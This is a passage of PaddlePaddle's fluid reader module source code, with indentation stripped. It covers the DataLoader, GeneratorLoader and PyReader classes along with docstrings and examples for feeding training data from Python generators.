self.use_shared_memory = False
assert timeout >= 0, "timeout should be a non-negative value"
self.timeout = timeout
if isinstance(dataset, IterableDataset):
self.dataset_kind = _DatasetKind.ITER
if shuffle:
raise ValueError(
"IterableDataset not support shuffle, but got shuffle={}".
format(shuffle))
if batch_sampler is not None:
raise ValueError(
"IterableDataset expect unspecified batch_sampler")
else:
self.dataset_kind = _DatasetKind.MAP
if batch_sampler is not None:
assert isinstance(batch_sampler, BatchSampler), \
"batch_sampler should be None or subclass instance " \
"of paddle.io.BatchSampler"
assert batch_size == 1 and not shuffle and not drop_last, \
"batch_size/shuffle/drop_last should not be set when " \
"batch_sampler is given"
self.batch_sampler = batch_sampler
else:
assert batch_size is not None and batch_size > 0, \
"batch_size should be a positive value when " \
"batch_sampler is not given"
if isinstance(dataset, IterableDataset):
self.batch_sampler = _InfiniteIterableSampler(dataset,
batch_size)
else:
self.batch_sampler = BatchSampler(
dataset=dataset,
batch_size=batch_size,
shuffle=shuffle,
drop_last=drop_last)
self.pin_memory = False
if in_dygraph_mode():
self.pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
def __len__(self):
return len(self.batch_sampler)
def __iter__(self):
if self.num_workers == 0:
return _DataLoaderIterSingleProcess(self)
else:
return _DataLoaderIterMultiProcess(self)
def __call__(self):
return self.__iter__()
@staticmethod
def from_generator(feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
use_multiprocess=False,
drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
.. note::
**The framework ensures that the data loading order of DataLoader is exactly the same as the user-defined data source.**
Create a DataLoader object for loading data from Python generator.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously.
The created DataLoader object provides 3 methods to set the data source
:code:`set_sample_generator` , :code:`set_sample_list_generator` and
:code:`set_batch_generator` . Please see the following example codes
to know their usages.
If iterable = True, the created DataLoader object is a Python generator
object, which is iterable using for-range loop.
If iterable = False, the created DataLoader object provides
:code:`start()` and :code:`reset()` method to control the data reading
process. This mode is designed to be compatible with the
:code:`fluid.layers.py_reader` interface. Users can migrate the codes
from :code:`fluid.layers.py_reader` to :code:`fluid.io.DataLoader`
easily when using iterable=False.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.data()`.
capacity (int): capacity of the queue maintained in DataLoader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created DataLoader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variables. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
use_multiprocess (bool): whether to use multi-process to speed up
the data loading process in dygraph. Note: this parameter only
can be used in the dygraph mode. In the static graph mode,
whether this parameter is set or not has no effect.
The Default value is False.
drop_last (bool): whether to drop the last batches whose number is
less than the CPU core/GPU card number. The default value is
True. In training phase, users should not set drop_last=False,
because all CPU cores/GPU cards must read data from DataLoader.
In inference phase, users can set drop_last=False, so that the
last batches whose number is less than the CPU core/GPU card
number can be tested.
Returns:
loader (DataLoader): the created DataLoader object.
Examples 1:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
BATCH_NUM = 10
BATCH_SIZE = 16
EPOCH_NUM = 4
CLASS_NUM = 10
ITERABLE = True # whether the created DataLoader object is iterable
USE_GPU = False # whether to use GPU
DATA_FORMAT = 'batch_generator' # data format of data source user provides
def simple_net(image, label):
fc_tmp = fluid.layers.fc(image, size=CLASS_NUM)
cross_entropy = fluid.layers.softmax_with_cross_entropy(image, label)
loss = fluid.layers.reduce_mean(cross_entropy)
sgd = fluid.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
def get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
# If the data generator yields one sample each time,
# use DataLoader.set_sample_generator to set the data source.
def sample_generator_creator():
def __reader__():
for _ in range(BATCH_NUM * BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
yield image, label
return __reader__
# If the data generator yield list of samples each time,
# use DataLoader.set_sample_list_generator to set the data source.
def sample_list_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
sample_list = []
for _ in range(BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
sample_list.append([image, label])
yield sample_list
return __reader__
# If the data generator yields a batch each time,
# use DataLoader.set_batch_generator to set the data source.
def batch_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = get_random_images_and_labels([BATCH_SIZE, 784], [BATCH_SIZE, 1])
yield batch_image, batch_label
return __reader__
# If DataLoader is iterable, use for loop to train the network
def train_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
for data in loader():
exe.run(prog, feed=data, fetch_list=[loss])
# If DataLoader is not iterable, use start() and reset() method to control the process
def train_non_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
loader.start() # call DataLoader.start() before each epoch starts
try:
while True:
exe.run(prog, fetch_list=[loss])
except fluid.core.EOFException:
loader.reset() # call DataLoader.reset() after catching EOFException
def set_data_source(loader, places):
if DATA_FORMAT == 'sample_generator':
loader.set_sample_generator(sample_generator_creator(), batch_size=BATCH_SIZE, drop_last=True, places=places)
elif DATA_FORMAT == 'sample_list_generator':
loader.set_sample_list_generator(sample_list_generator_creator(), places=places)
elif DATA_FORMAT == 'batch_generator':
loader.set_batch_generator(batch_generator_creator(), places=places)
else:
raise ValueError('Unsupported data format')
image = fluid.data(name='image', shape=[None, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
# Define DataLoader
loader = fluid.io.DataLoader.from_generator(feed_list=[image, label], capacity=16, iterable=ITERABLE)
# Define network
loss = simple_net(image, label)
# Set data source of DataLoader
#
# If DataLoader is iterable, places must be given and the number of places must be the same with device number.
# - If you are using GPU, call `fluid.cuda_places()` to get all GPU places.
# - If you are using CPU, call `fluid.cpu_places()` to get all CPU places.
#
# If DataLoader is not iterable, places can be None.
places = fluid.cuda_places() if USE_GPU else fluid.cpu_places()
set_data_source(loader, places)
exe = fluid.Executor(places[0])
exe.run(fluid.default_startup_program())
prog = fluid.CompiledProgram(fluid.default_main_program()).with_data_parallel(loss_name=loss.name)
if loader.iterable:
train_iterable(exe, prog, loss, loader)
else:
train_non_iterable(exe, prog, loss, loader)
'''
Users can use return_list = True in dygraph mode.
'''
with fluid.dygraph.guard(places[0]):
loader = fluid.io.DataLoader.from_generator(capacity=2, return_list=True)
set_data_source(loader, places[0])
for image, label in loader():
relu = fluid.layers.relu(image)
assert image.shape == [BATCH_SIZE, 784]
assert label.shape == [BATCH_SIZE, 1]
assert relu.shape == [BATCH_SIZE, 784]
Examples 2:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
import os
# We use 2 CPU cores to run inference network
os.environ['CPU_NUM'] = '2'
# The data source has only 3 batches, which can not be
# divided evenly to each CPU core
def batch_generator():
for i in range(3):
yield np.array([i+1]).astype('float32'),
x = fluid.data(name='x', shape=[None], dtype='float32')
y = x * x
def run_inference(drop_last):
loader = fluid.io.DataLoader.from_generator(feed_list=[x],
capacity=8, drop_last=drop_last)
loader.set_batch_generator(batch_generator, fluid.cpu_places())
exe = fluid.Executor(fluid.CPUPlace())
prog = fluid.CompiledProgram(fluid.default_main_program())
prog = prog.with_data_parallel()
result = []
for data in loader():
each_ret, = exe.run(prog, feed=data, fetch_list=[y])
result.extend(each_ret)
return result
# Set drop_last to True, so that the last batch whose
# number is less than CPU core number would be discarded.
print(run_inference(drop_last=True)) # [1.0, 4.0]
# Set drop_last to False, so that the last batch whose
# number is less than CPU core number can be tested.
print(run_inference(drop_last=False)) # [1.0, 4.0, 9.0]
"""
if in_dygraph_mode():
return DygraphGeneratorLoader(feed_list, capacity,
use_double_buffer, iterable,
return_list, use_multiprocess)
else:
return GeneratorLoader(feed_list, capacity, use_double_buffer,
iterable, return_list, drop_last)
@staticmethod
def from_dataset(dataset, places, drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
Create an iterable DataLoader object for loading data from Dataset.
Dataset is only supported in Linux system currently.
Args:
dataset (InMemoryDataset|QueueDataset): the dataset object.
places (list(CUDAPlace)|list(CPUPlace)): places where the result
data should be converted.
drop_last (bool): whether to drop the last batch whose sample
number is less than batch size. If drop_last = True, they
would be dropped. If drop_last = False, they would be kept.
Returns:
loader (DataLoader): the created DataLoader object, which can be
treated as a Python generator.
Examples:
.. code-block:: python
import paddle.fluid as fluid
image = fluid.data(name='image', shape=[None, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
dataset = fluid.DatasetFactory().create_dataset("QueueDataset")
dataset.set_batch_size(32)
dataset.set_filelist(['a.txt', 'b.txt', 'c.txt'])
dataset.set_use_var([image, label])
dataset.set_pipe_command('cat')
loader = fluid.io.DataLoader.from_dataset(dataset, fluid.cpu_places())
"""
return DatasetLoader(dataset, places, drop_last)
class DygraphGeneratorLoader(DataLoaderBase):
"""
The GeneratorLoader of dygraph
The multiprocess dygraph GeneratorLoader's most functions are different from
static graph GeneratorLoader, Separate implementation to keep code readable.
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=True,
use_multiprocess=False):
self._batch_reader = None
self._places = None
self._feed_list = feed_list
if not capacity:
raise ValueError("Please give value to capacity.")
self._capacity = capacity
self._use_double_buffer = use_double_buffer
if not iterable:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports iterable mode only. Change to iterable mode."
)
self._iterable = True
if not return_list:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports returning as list only. Change to return as list."
)
self._return_list = True
# NOTE: the multiprocessing in different platform is incompatible, we will solve it later
self._use_multiprocess = use_multiprocess
if self._use_multiprocess and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"NOTE: DygraphGeneratorLoader with multiprocess mode is not currently supported on MacOs and Windows."
)
self._use_multiprocess = False
if self._use_multiprocess:
# NOTE: the multiprocessing.Queue used to save loading data in self._process
self._data_queue = None
# NOTE: this process is used to load data asynchronously from self._batch_reader
self._process = None
# NOTE: the C++ LoDTensorBlockingQueue instance
self._blocking_queue = None
# NOTE: 1. In multiprocess mode, this thread is used to get next batch data from
# self._data_queue, then push it into self._blocking_queue; 2. In singleprocess
# mode, this thread is used to get next batch data from self._batch_reader, then
# push it into self._blocking_queue
self._thread = None
self._pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
@property
def queue(self):
return self._blocking_queue
@property
def iterable(self):
return self._iterable
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except queue.Empty:
break
global multiprocess_queue_set
multiprocess_queue_set.remove(self._data_queue)
def _wait_thread_ends(self):
thread = self._thread
if thread is not None:
self._blocking_queue.close()
thread.join()
def _wait_process_ends(self):
process = self._process
if process is not None:
process.join()
# erase process id
core._erase_process_pids(id(self))
def _init_iterable(self):
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
self._var_names = []
self._shapes = []
self._dtypes = []
self._need_check_feed = []
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, False)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer, True,
self._pin_memory)
def _start(self):
if self._use_multiprocess:
# clear old _data_queue and remove it from multiprocess_queue_set
self._clear_and_remove_data_queue()
# set data_queue and process
self._data_queue = multiprocessing.Queue(self._capacity)
# add _data_queue into global queue set
global multiprocess_queue_set
multiprocess_queue_set.add(self._data_queue)
self._process = multiprocessing.Process(
target=_reader_process_loop,
args=(self._batch_reader, self._data_queue))
self._process.daemon = True
self._process.start()
# Set child process signal handler
# NOTE: [ avoiding hang ] 1. if the child process dies due to bus error/segfault
# or just hang, the main process will hang waiting for data, so here need to deal
# with SIGSEGV and SIGBUS of child process; 2. if the main process end before child
# process, it shuts the all its daemonic children down with a SIGTERM (instead of
# joining them without a timeout), so here nedd to deal with SIGTERM.
core._set_process_pids(id(self), [self._process.pid])
_set_SIGCHLD_handler()
# Set reader_thread
self._thread_done_event = threading.Event()
self._thread = threading.Thread(
target=self._reader_thread_loop_for_multiprocess)
self._thread.daemon = True
self._thread.start()
else:
self._thread = threading.Thread(
target=self._reader_thread_loop_for_singleprocess)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._reader.reset()
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._batch_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
return self._reader.read_next_var_list()
except StopIteration:
self._reset()
six.reraise(*sys.exc_info())
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _reader_thread_loop_for_multiprocess(self):
while not self._thread_done_event.is_set():
try:
# NOTE: [ avoid hanging ] Even with carefully designed data dependencies
# (i.e., a put() always corresponding to a get()), hanging on get() can
# still happen when data in queue is corrupted (e.g., due to
# Queue.cancel_join_thread or unexpected exit). So we set a timeout whenever
# we try to get data from `data_queue`
# NOTE: [ avoid failed quickly ] Here, the time setting of QUEUE_GET_TIMEOUT
# is relatively long, currently it is 60 seconds, because in some models,
# if the reader child process starts with a heavy burden, the child process
# has no enough time to put the data in the queue when the main process
# start trying to get data from queue. At this time, the child thread needs
# to wait slightly longer
tensor_list = self._data_queue.get(timeout=QUEUE_GET_TIMEOUT)
except:
# NOTE [ avoid handing ] After adding the shared memory mechanism, not only
# the queue.Empty exception will occur here, but other exceptions will also
# occur, such as mmap failure. If it is not handled here, it will hang.
self._exit_thread_unexpectedly()
logging.error(
"DataLoader reader thread failed to read data from the multiprocessing.Queue."
)
six.reraise(*sys.exc_info())
if not self._thread_done_event.is_set():
if tensor_list is not None:
try:
array = core.LoDTensorArray()
for tensor in tensor_list:
array.append(tensor)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
else:
self._exit_thread_expectedly()
def _reader_thread_loop_for_singleprocess(self):
try:
for sample in self._batch_reader():
array = core.LoDTensorArray()
for item in sample:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning(
"DygraphDataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
return self
def set_sample_list_generator(self, reader, places=None):
def __batch_reader_impl__():
for batch in reader():
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
yield slots
self.set_batch_generator(__batch_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._batch_reader = reader
if places is None:
places = _current_expected_place()
self._places = _convert_places(places)
assert len(self._places) == 1, \
"Number of places must be 1 in imperative mode"
return self
class GeneratorLoader(DataLoaderBase):
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
drop_last=True):
self._tensor_reader = None
self._places = None
self._thread = None
self._queue = None
self._feed_list = feed_list
self._exited = False
self._drop_last = drop_last
self._keep_order = keep_data_loader_order()
if not capacity:
raise ValueError("Please give value to capacity.")
self._iterable = iterable
self._return_list = return_list
if not self._feed_list:
raise Exception("Feed list must be given under static mode.")
self._use_double_buffer = use_double_buffer
self._capacity = capacity
if not self._iterable:
self._init_non_iterable()
def _wait_thread_ends(self):
# Get self._thread first to prevent data race, because __thread_main__
# would set self._thread be None at the end
thread = self._thread
if thread is not None and self._iterable:
self._queue.close()
thread.join()
def _init_iterable(self):
self._wait_thread_ends()
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
self._queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, self._keep_order)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer,
self._drop_last, False)
def _init_non_iterable(self):
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in self._feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
queue_name = data_loader_unique_name_generator(
'lod_tensor_blocking_queue')
reader_name = data_loader_unique_name_generator('create_py_reader')
double_buffer_name = data_loader_unique_name_generator('double_buffer')
var = global_scope().var(queue_name)
self._queue = core.init_lod_tensor_blocking_queue(var, self._capacity,
self._keep_order)
if self._keep_order:
block = default_main_program().current_block()
else:
block = default_startup_program().current_block()
reader_var = block.create_var(name=reader_name)
dtype_int = [int(t) for t in dtypes]
block.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [reader_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
reader_var.desc.set_dtypes(dtypes)
reader_var.persistable = True
reader_var.stop_gradient = True
if self._keep_order:
main_prog_var = reader_var
reader = main_prog_var
reader.reset = self._queue.reset
else:
main_prog_var = _copy_reader_var_(
default_main_program().current_block(), reader_var)
main_prog_var.stop_gradient = True
main_prog_var.persistable = True
reader = monkey_patch_reader_methods(main_prog_var)
if self._use_double_buffer:
double_buffer_reader = double_buffer(
reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
self._reader = reader
default_main_program().current_block().append_op(
type='read',
inputs={'Reader': [self._reader]},
outputs={'Out': self._feed_list},
attrs={'drop_last': self._drop_last})
@property
def queue(self):
return self._queue
@property
def iterable(self):
return self._iterable
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._tensor_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if self._return_list:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._queue.close()
self._reset()
six.reraise(*sys.exc_info())
def start(self):
assert not self._iterable, "start() cannot be called when DataLoader is iterable"
self._start()
def reset(self):
assert not self._iterable, "reset() cannot be called when DataLoader is iterable"
self._reset()
def _start(self):
def __thread_main__():
try:
while not self._queue.wait_for_inited(1):
if self._exited:
return
for tensors in self._tensor_reader():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._queue.push(array):
break
self._queue.close()
self._thread = None
except Exception as ex:
self._queue.kill()
self._thread = None
logging.warn('Your reader has raised an exception!')
six.reraise(*sys.exc_info())
self._thread = threading.Thread(target=__thread_main__)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._queue.close()
self._exited = True
thread = self._thread
if thread is not None:
thread.join()
self._exited = False
self._reader.reset()
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
has_lod = False
for f in self._feed_list:
if f.lod_level != 0:
has_lod = True
break
if has_lod:
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
else:
reader = BatchedTensorProvider(
feed_list=self._feed_list,
place=core.CPUPlace(),
batch_size=batch_size,
generator=reader,
drop_last=drop_last)
self.set_batch_generator(reader, places=places)
return self
def set_sample_list_generator(self, reader, places=None):
with program_guard(Program(), Program()):
feeder = DataFeeder(
feed_list=self._feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(reader, multi_devices=False)
def __tensor_reader_impl__():
for slots in paddle_reader():
yield [slots[var.name] for var in self._feed_list]
self.set_batch_generator(__tensor_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._tensor_reader = reader
if self._iterable:
assert places is not None, "Places cannot be None when DataLoader is iterable"
self._places = _convert_places(places)
else:
if places is not None:
logging.info(
'places would be ommited when DataLoader is not iterable')
return self
class PyReader(DataLoaderBase):
"""
Create a reader object for data feeding in Python.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously. Data in the queue would be extracted
automatically when `Executor.run(...)` is called.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.layers.data()`.
capacity (int): capacity of the queue maintained in PyReader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, PyReader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created PyReader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variables. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
Returns:
the created reader object.
Return type:
reader(Reader)
Examples:
1. If iterable = False, the created PyReader object is almost the
same as :code:`fluid.layers.py_reader()`. Operators would be
inserted into the program. User should call :code:`start()`
before each epoch and catch :code:`fluid.core.EOFException`
thrown by :code:`Executor.run()` when epoch ends. Once the
exception is caught, user should call :code:`reset()` to reset
the reader manually.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image_and_label(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label],
capacity=4,
iterable=False)
user_defined_reader = reader_creator_random_image_and_label(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE))
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(EPOCH_NUM):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
2. If iterable=True, the created PyReader object is decoupled with
the program. No operator would be inserted into the program.
In this case, the created reader is a Python generator, which
is iterable. User should feed the data yielded from PyReader
object into :code:`Executor.run(feed=...)`.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 10
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0, high=255, size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True, return_list=False)
user_defined_reader = reader_creator_random_image(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
3. If return_list=True, the return values would be presented as list instead of dict.
This is usually used in dygraph mode.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
ITER_NUM = 5
BATCH_SIZE = 10
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
yield np.random.uniform(low=0, high=255, size=[height, width]), \
np.random.random_integers(low=0, high=9, size=[1])
return reader
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
py_reader = fluid.io.PyReader(capacity=2, return_list=True)
user_defined_reader = reader_creator_random_image(784, 784)
py_reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
place)
for image, label in py_reader():
relu = fluid.layers.relu(image)
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False):
self._loader = DataLoader.from_generator(
feed_list, capacity, use_double_buffer, iterable, return_list)
@property
def queue(self):
return self._loader.queue
@property
def iterable(self):
return self._loader.iterable
def __iter__(self):
return self._loader.__iter__()
def __next__(self):
return self._loader.__next__()
def start(self):
'''
Start the data feeding thread.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.start()
def reset(self):
'''
Reset the reader object when :code:`fluid.core.EOFException` raises.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.reset()
def decorate_sample_generator(self,
sample_generator,
batch_size,
drop_last=True,
places=None):
'''
Set the data source of the PyReader object.
The provided :code:`sample_generator` should be a Python generator,
which yields list(numpy.ndarray)-typed data of each sample.
:code:`places` must be set when the PyReader object is iterable.
If all inputs have no lods, this method is faster than
:code:`decorate_sample_list_generator(paddle.batch(sample_generator, ...))` .
Args:
sample_generator (generator): Python generator that yields
list(numpy.ndarray)-typed sample data.
batch_size (int): batch size. Must be larger than 0.
drop_last (bool): Whether to drop the last batch when sample number
is less than batch_size.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.array([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_generator(user_defined_generator,
batch_size=BATCH_SIZE,
places=[fluid.CPUPlace()])
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_generator(sample_generator, batch_size,
drop_last, places)
def decorate_sample_list_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields list(numpy.ndarray) typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields
list(numpy.ndarray)-typed batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
